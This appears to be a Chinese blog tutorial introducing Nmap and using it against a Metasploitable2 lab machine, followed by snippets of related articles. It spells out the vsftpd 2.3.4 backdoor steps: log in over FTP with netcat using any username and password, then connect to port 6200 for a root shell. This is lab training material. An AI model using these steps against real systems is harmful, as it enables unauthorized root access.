NMAP扫描应用

最新推荐文章于 2025-09-26 09:29:53 发布
原创 最新推荐文章于 2025-09-26 09:29:53 发布 · 2.9k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #运维 #服务器

本文介绍了网络扫描工具Nmap的基础用法,从查看本地IP到扫描Metasploitable2靶机,展示了如何发现服务版本、端口状态及漏洞利用过程。重点包括了nmap命令的使用和Metasploit对靶机的渗透实践。

对nmap进行简单的介绍:

Nmap (“Network Mapper(网络映射器)”) 是一款开放源代码的 网络探测和安全审核的工具。它的设计目标是快速地扫描大型网络,用它扫描单个主机也没有问题。Nmap以新颖的方式使用原始IP报文来发现网络上有哪些主机,那些 主机提供什么服务(应用程序名和版本),那些服务运行在什么操作系统(包括版本信息), 它们使用什么类型的报文过滤器/防火墙,以及一堆其它功能。虽然Nmap通常用于安全审核, 许多系统管理员和网络管理员也用它来做一些日常的工作,比如查看整个网络的信息, 管理服务升级计划,以及监视主机和服务的运行。

nmap的用法详解可参考以下链接

扫描工具——Nmap用法详解https://www.cnblogs.com/weihua2616/p/6599629.htmlhttps://www.cnblogs.com/weihua2616/p/6599629.html其中还涉及到端口,端口的介绍参考以下链接

常用端口号与对应的服务以及端口关闭https://blog.youkuaiyun.com/hanghangde/article/details/50999253https://blog.youkuaiyun.com/hanghangde/article/details/50999253

还有Metasploitable2靶机的介绍和利用

Metasploit -- 攻击Metasploitable2靶机https://my.oschina.net/u/3838688/blog/4430517icon-default.png?t=LA92https://my.oschina.net/u/3838688/blog/4430517

下面是对nmap的应用

一、首先用ifconfig查看本地ip

二、Metasploitable2靶机

1、开机后先登录,账号密码都是: msfadmin

注意:输入密码的时候是不可见的,输入完直接回车就登录进去了

 2、用ifconfig命令查看ip地址

三、用nmap扫描发现靶机 nmap 

 

四、查看服务器版本 nmap -sV +靶机ip

注意:要严格区分大小写

vsftpd是2.3.4版本

四、查看6200端口的状态 nmap -p +靶机ip

可以看到6200端口是关闭的

五、用nc连接靶机并登录 nc+靶机ip+21

输入

user mm(任意输入):)

pass 11(任意输入)  回车 

六、再次查看6200端口的状态

已经开放

七、继续连接6200端口 nc + 靶机ip + 6200

八、显示自身的用户名称 whoami

显示root,就表示你已经是靶机的管理员啦 

Coffilater
关注
Nmap脚本的应用场景
Kali与编程
12-09 1298
在渗透测试工程师的角度下,本文详细阐述了Nmap脚本的应用场景,并提供了如何使用Nmap脚本进行网络设备和服务的管理和维护的步骤。Nmap是一款常用的网络扫描工具,它可以扫描网络上的主机和服务,探测开放的端口和漏洞,为渗透测试工程师提供了许多有用的信息。在渗透测试中,了解目标系统的信息是非常重要的,可以帮助渗透测试工程师更好地了解目标系统的架构和运行环境,为后续的漏洞探测和利用提供有力支持。在渗透测试工程师的角度下,本文将详细阐述Nmap脚本的应用场景,以及如何使用Nmap脚本进行网络安全检测和漏洞扫描
Kali Linux学习使用nmap扫描和标识应用服务
2301_81920872的博客
12-17 1249
目录 一.引言 二.任务实现 1、-sn 2、扫描开放端口 3、识别服务版本和操作系统 4.-sT 5.-Pn 6.-v 7.-pN1,N2,...,Nn 三.其他工具 四.总结(感言) 一.引言 Nmap是全球最广泛使用的端口扫描工具之一,它不仅能够识别活动主机、扫描TCP和UDP开放端口,还能检测防火墙、获取远程主机上运行的服务版本,并且通过脚本发现和利用漏洞。除了Nmap,还有一种名为ZMap的工具,在某些情况下被认为在端口扫描方面更为高
深入了解 Nmap:网络安全扫描工具的强大功能与实战应用
hello.reader
09-04 2475
Nmap(Network Mapper)是一款开源的网络扫描工具,被广泛用于网络发现、管理和安全审计。自1997年由 Gordon Lyon(Fyodor)发布以来,Nmap 一直是网络管理员、安全专家、渗透测试人员的重要工具。Nmap 支持多种操作系统,包括 Windows、Linux、Mac OS 和其他类 Unix 系统。Nmap 的功能不仅限于端口扫描,还可以执行操作系统检测、服务版本检测、脚本引擎扫描、网络拓扑发现等。
NMAP漏洞扫描实战详解与网络安全应用
最新发布
weixin_42600128的博客
09-26 991
NMAP(Network Mapper)由Gordon Lyon于1997年发布,最初旨在提供一种高效、灵活的网络探测手段。作为开源安全领域的里程碑式工具,它不仅支持跨平台运行(Linux、Windows、macOS),还通过持续迭代构建了涵盖主机发现、端口扫描、服务识别、操作系统指纹分析及漏洞探测的完整技术体系。
Nmap扫描和识别服务
weixin_40763897的博客
10-30 3114
安装Nmap 如果你安装了Kali linux系统,那么这个工具是自带的。如果没有这个工具可以通过如下命令安装: # 更新系统 $ apt-get update # 安装 nmap $ apt-get install nmap 使用 nmap 扫描主机 IP 使用方法:nmap 主机 IP 地址 ...
nmap 使用
mixboot
03-30 1167
1. Tcp SYN Scan 目标主机不会产生日志 # nmap -sS 192.168.128.1/24 2. FIN scan # nmap -sF 192.168.128.1/24 3. PING Scan 扫描速度最快 nmap -sP 192.168.128.1/24 4. sV 软件版本 # nmap -sS -sV 192.168.128.1 5. O 操作...
Nmap 确定服务和服务程序的版本
suiyideAli的博客
06-24 3014
Nmap 确定服务和服务程序的版本 1.操作参数 nmap -sS -n -vv -F scanme.nmap.org nmap -sS -n -vv -sV -F scanme.nmap.org 两条语句相比较,第二条多了一条 version 版本识别号 (1)-sV:探测开放端口的服务和版本信息 (2)--version-in...
网络安全实验NMAP扫描.docx
09-16
知识点三:NMAP扫描应用 NMAP应用包括安全审计、网络发现、版本检测和漏洞评估等。NMAP可以帮助网络安全专业人员发现网络中的主机和开放端口,检测网络中的漏洞和风险,并进行安全审计和版本检测。 知识点四:...
nmap 扫描应用(英文版)
11-15
Open Source Security Tool Turbo Talks • Nmap Scripting Engine • IPv6 • Zenmap GUI • Nmap Suite • Final Notes & Q&A
网络安全实验---NMAP扫描.docx
06-09
网络安全实验---NMAP扫描全文共8页,当前为第1页。网络安全实验---NMAP扫描全文共8页,当前为第1页。实验目的和要求 网络安全实验---NMAP扫描全文共8页,当前为第1页。 网络安全实验---NMAP扫描全文共8页,当前为第1...
网络安全Nmap扫描技术详解:涵盖多种扫描类型、参数优化及实际应用案例
08-07
内容概要:本文详细介绍了Nmap这一强大的网络扫描工具的使用方法及其多种扫描类型。文章首先阐述了五种主要的扫描类型,包括TCP connect、TCP SYN、TCP ACK、TCP FIN/Xmas/NULL以及UDP扫描,每种扫描方式都有其特点...
2017-2018-2 20179306 《网络攻防技术》nmap+wireshark攻防实验
weixin_30873847的博客
05-12 645
网络攻防环境的搭建与测试 windows攻击机(VM_WinXPattacker)ip: linux攻击机(SEEDUbuntu9_August_2010)ip: windows靶机(VM_Metasploitable_xpsp1)ip: linux靶机(VM_Metasploitable_ubuntu)ip: win ping win: win ping linu...
账号安全及应用
sjc090132的博客
07-14 913
账号安全方面的一些基础知识
扫描技术的原理与应用Nmap使用)
zzx751775692的博客
03-23 1万+
扫描技术的原理与应用Nmap使用)一、实践内容二、实践过程1.TCP connect扫描方式1.1 TCP connect1.2 进行扫描并捕获数据包1.3 单独扫描某一端口并捕获数据包2.TCP SYN扫描方式2.1 TCP SYN2.2 使用Nmap进行扫描并捕获数据包3.操作系统扫描方式3.1 操作系统探测3.2 Kali操作系统探测3.3 Ubuntu操作系统探测3.4 数据包分析(1)操作系统探测数据库(2)系统探测过程4.使用漏洞扫描扫描目标的漏洞信息三、实践总结 一、实践内容 TCP co
Nmap扫描原理与用法
热门推荐
网络安全技术修炼
06-26 14万+
Nmap扫描原理与用法 2012年6月16日 1     Nmap介绍 Nmap扫描原理与用法PDF:下载地址 Nmap是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具。软件名字Nmap是Network Mapper的简称。Nmap最初是由Fyodor在1997年开始创建的。随后在开源社区众多的志愿者参与下
kali扫不到靶机ip的解决办法
weixin_52963334的博客
08-08 5124
扫不到靶机ip
Nmap高级用法与典型场景
网络安全技术修炼
09-15 1万+
Nmap高级用法与典型场景 2012年9月15日 星期六   Nmap提供了四项基本功能(主机发现、端口扫描、服务与版本侦测、OS侦测)及丰富的脚本库。Nmap既能应用于简单的网络信息扫描,也能用在高级、复杂、特定的环境中:例如扫描互联网上大量的主机;绕开防火墙/IDS/IPS;扫描Web站点;扫描路由器等等。   简要回顾Nmap简单的扫描方式: 全面扫描nmap-T4 -A
Nmap的几种扫描方式以及相应的命令
Sumarua的博客
02-28 8134
Nmap的几种扫描方式以及相应的命令
NMAP扫描技巧与实战应用
本文档主要收集了一些NMAP的实例,展示了如何利用NMAP进行各种扫描操作,包括识别远程主机的操作系统、开放端口、查找在线主机、检查网络漏洞以及识别恶意接入点等。" 1) 获取远程主机的系统类型及开放端口: `nmap...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值